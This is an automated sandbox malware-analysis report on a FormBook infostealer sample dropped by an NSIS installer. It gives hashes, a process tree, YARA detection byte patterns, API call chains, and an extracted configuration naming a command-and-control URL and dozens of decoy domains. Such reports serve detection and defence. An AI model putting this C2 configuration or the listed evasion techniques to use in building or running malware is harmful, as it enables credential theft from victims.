Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.17207

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.17207 (renamed file extension from 17207 to exe)
Analysis ID:626424
MD5:14848f52302c15e27b26fee5fada11c1
SHA1:04d62d915bd1a81c4b5ed35df6edb953107398c8
SHA256:4ac982ea35522a13de30ff7ddbbec9becf2c7528a48f0aff377e3d6758a7ae7b
Tags:exe
Infos:

Detection

FormBook
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe (PID: 5944 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe" MD5: 14848F52302C15E27B26FEE5FADA11C1)
    • miylwnpd.exe (PID: 3908 cmdline: C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl MD5: FF4C2F4D6E1FA34E8B958993C0DE134D)
      • miylwnpd.exe (PID: 1900 cmdline: C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl MD5: FF4C2F4D6E1FA34E8B958993C0DE134D)
  • cleanup
{"C2 list": ["www.beamaster.info/p0ip/"], "decoy": ["webberkerr.com", "lelezhuanshu.xyz", "weedformellc.com", "ikzoekeenbedrijfsruimte.com", "swahlove.com", "dubaidesertsafari.travel", "atozmedicalimages.com", "uniytriox.com", "clickyourcat.com", "shandun-safety.com", "pakmart.center", "roxxiesixx.com", "twistedtaqueriachicago.com", "studynursingaustralia.online", "wellnesstestinggroup.com", "justusebias.com", "yqvzs.com", "co1l7o8vy.com", "lightning.legal", "cardamagescanner.com", "megawatchinc.com", "sadebademli.com", "bcoky.com", "unleashingyou-lifecoaching.com", "epsubtitles.online", "susanpetersonrealty.com", "gdderui.com", "claris-studio.cloud", "cryptomnis.com", "1ens.domains", "localbusinessassets.com", "et9n7e4vf.com", "quoteypants.com", "bokepremaja18.biz", "xiangqinmao.com", "lilot-pland45.site", "exilings.com", "nft-id.net", "sport-outdoorpacks.com", "plnykosik.online", "cidesadelcentro.com", "stunning-black.xyz", "zoeyunker.com", "videogamesgroup.com", "autodnstest.com", "bookworms.store", "69817269.com", "one-session22-lp.com", "modelofindia.com", "kennnyshands.com", "otopenishop.net", "freegameswithoutdownload.online", "alaskanwave.net", "tjkt8.com", "abv.wiki", "protoncarsale.com", "zhipurc.com", "psicologamoderna.com", "hidinginplainsight.digital", "cuamini-trankien.xyz", "yustunning.com", "apeironpay.xyz", "allowdrops.xyz", "allyouneedstore.xyz"]}
SourceRuleDescriptionAuthorStrings
00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8f92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x16335:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15de1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16437:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x165af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x99aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1505c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa722:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18809:$sqlite3step: 68 34 1C 7B E1
    • 0x1891c:$sqlite3step: 68 34 1C 7B E1
    • 0x18838:$sqlite3text: 68 38 2A 90 C5
    • 0x1895d:$sqlite3text: 68 38 2A 90 C5
    • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
    SourceRuleDescriptionAuthorStrings
    1.2.miylwnpd.exe.2cb0000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
      1.2.miylwnpd.exe.2cb0000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8192:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15535:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14fe1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15637:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x157af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x8baa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1425c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9922:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1bc8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      1.2.miylwnpd.exe.2cb0000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x17a09:$sqlite3step: 68 34 1C 7B E1
      • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
      • 0x17a38:$sqlite3text: 68 38 2A 90 C5
      • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
      • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
      1.2.miylwnpd.exe.2cb0000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.miylwnpd.exe.2cb0000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8f92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x16335:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15de1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x16437:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x165af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x99aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1505c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa722:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Click to see the 1 entries
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.beamaster.info/p0ip/"], "decoy": ["webberkerr.com", "lelezhuanshu.xyz", "weedformellc.com", "ikzoekeenbedrijfsruimte.com", "swahlove.com", "dubaidesertsafari.travel", "atozmedicalimages.com", "uniytriox.com", "clickyourcat.com", "shandun-safety.com", "pakmart.center", "roxxiesixx.com", "twistedtaqueriachicago.com", "studynursingaustralia.online", "wellnesstestinggroup.com", "justusebias.com", "yqvzs.com", "co1l7o8vy.com", "lightning.legal", "cardamagescanner.com", "megawatchinc.com", "sadebademli.com", "bcoky.com", "unleashingyou-lifecoaching.com", "epsubtitles.online", "susanpetersonrealty.com", "gdderui.com", "claris-studio.cloud", "cryptomnis.com", "1ens.domains", "localbusinessassets.com", "et9n7e4vf.com", "quoteypants.com", "bokepremaja18.biz", "xiangqinmao.com", "lilot-pland45.site", "exilings.com", "nft-id.net", "sport-outdoorpacks.com", "plnykosik.online", "cidesadelcentro.com", "stunning-black.xyz", "zoeyunker.com", "videogamesgroup.com", "autodnstest.com", "bookworms.store", "69817269.com", "one-session22-lp.com", "modelofindia.com", "kennnyshands.com", "otopenishop.net", "freegameswithoutdownload.online", "alaskanwave.net", "tjkt8.com", "abv.wiki", "protoncarsale.com", "zhipurc.com", "psicologamoderna.com", "hidinginplainsight.digital", "cuamini-trankien.xyz", "yustunning.com", "apeironpay.xyz", "allowdrops.xyz", "allyouneedstore.xyz"]}
        Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeVirustotal: Detection: 41%Perma Link
        Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeReversingLabs: Detection: 34%
        Source: Yara matchFile source: 1.2.miylwnpd.exe.2cb0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.miylwnpd.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeVirustotal: Detection: 20%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeReversingLabs: Detection: 24%
        Source: 1.2.miylwnpd.exe.2cb0000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: C:\sltck\alpfsb\pnlp\5a4eb681595f48a7816b70c325f39788\dfkzie\sffldbix\Release\sffldbix.pdb source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe, 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmp, miylwnpd.exe, 00000001.00000000.230322990.00000000002EE000.00000002.00000001.01000000.00000004.sdmp, miylwnpd.exe, 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmp, miylwnpd.exe, 00000002.00000000.232221642.00000000002EE000.00000002.00000001.01000000.00000004.sdmp, nsaF211.tmp.0.dr, miylwnpd.exe.0.dr
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeCode function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D7A
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeCode function: 0_2_004069A4 FindFirstFileW,FindClose,0_2_004069A4
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B

        Networking

        barindex
        Source: Malware configuration extractorURLs: www.beamaster.info/p0ip/
        Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeCode function: 0_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040580F

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: 1.2.miylwnpd.exe.2cb0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.miylwnpd.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Source: 1.2.miylwnpd.exe.2cb0000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 1.2.miylwnpd.exe.2cb0000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 1.2.miylwnpd.exe.2cb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 1.2.miylwnpd.exe.2cb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: 1.2.miylwnpd.exe.2cb0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 1.2.miylwnpd.exe.2cb0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 1.2.miylwnpd.exe.2cb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 1.2.miylwnpd.exe.2cb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403646
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeCode function: 1_2_002E18901_2_002E1890
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeCode function: 1_2_002E9C121_2_002E9C12
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeCode function: 1_2_002E96A01_2_002E96A0
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeCode function: 1_2_002E7E881_2_002E7E88
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeCode function: 1_2_002EC3BD1_2_002EC3BD
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeCode function: 1_2_002EA1841_2_002EA184
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeCode function: 1_2_002EB3F11_2_002EB3F1
        Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeVirustotal: Detection: 41%
        Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeReversingLabs: Detection: 34%
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeJump to behavior
        Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeProcess created: C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeProcess created: C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeProcess created: C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtblJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeProcess created: C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtblJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403646
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeCommand line argument: ^F.1_2_002E45B0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeFile created: C:\Users\user\AppData\Local\Temp\nsaF210.tmpJump to behavior
        Source: classification engineClassification label: mal84.troj.winEXE@5/4@0/0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeCode function: 0_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404ABB
        Source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: C:\sltck\alpfsb\pnlp\5a4eb681595f48a7816b70c325f39788\dfkzie\sffldbix\Release\sffldbix.pdb source: SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe, 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmp, miylwnpd.exe, 00000001.00000000.230322990.00000000002EE000.00000002.00000001.01000000.00000004.sdmp, miylwnpd.exe, 00000001.00000002.233550962.00000000002EE000.00000002.00000001.01000000.00000004.sdmp, miylwnpd.exe, 00000002.00000000.232221642.00000000002EE000.00000002.00000001.01000000.00000004.sdmp, nsaF211.tmp.0.dr, miylwnpd.exe.0.dr
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeCode function: 1_2_002E2445 push ecx; ret 1_2_002E2458
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeFile created: C:\Users\user\AppData\Local\Temp\miylwnpd.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeCode function: 1_2_002E1890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_002E1890
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-6461
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeCode function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D7A
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeCode function: 0_2_004069A4 FindFirstFileW,FindClose,0_2_004069A4
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeAPI call chain: ExitProcess graph end nodegraph_0-3509
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeAPI call chain: ExitProcess graph end nodegraph_1-6463
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeCode function: 1_2_002E7A95 IsDebuggerPresent,1_2_002E7A95
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeCode function: 1_2_002E558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_002E558A
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeCode function: 1_2_002E86ED __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_002E86ED
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeCode function: 1_2_002E439B SetUnhandledExceptionFilter,1_2_002E439B
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeCode function: 1_2_002E43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_002E43CC
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeProcess created: C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtblJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeCode function: 1_2_002E3283 cpuid 1_2_002E3283
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403646
        Source: C:\Users\user\AppData\Local\Temp\miylwnpd.exeCode function: 1_2_002E3EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_002E3EC8

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 1.2.miylwnpd.exe.2cb0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.miylwnpd.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 1.2.miylwnpd.exe.2cb0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.miylwnpd.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000001.00000002.233653327.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts2
        Command and Scripting Interpreter
